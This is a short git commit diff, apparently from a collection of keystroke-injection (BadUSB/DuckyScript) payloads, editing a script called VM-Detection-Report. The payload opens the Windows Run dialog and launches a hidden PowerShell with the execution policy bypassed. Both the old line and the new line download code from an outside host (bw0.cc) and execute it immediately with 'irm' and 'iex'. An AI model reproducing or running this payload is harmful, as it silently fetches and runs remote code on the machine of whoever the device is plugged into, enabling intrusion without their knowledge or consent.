Update VM-Detection-Report.txt

This commit is contained in:
egieb
2025-06-18 15:21:52 +00:00
committed by GitHub
parent f9e99f4b5f
commit d7df5183fa

View File

@@ -11,5 +11,5 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://bw0.cc/vmdet | iex
STRING powershell -Ep Bypass -W H -C iex (irm bw0.cc/vmdet)
ENTER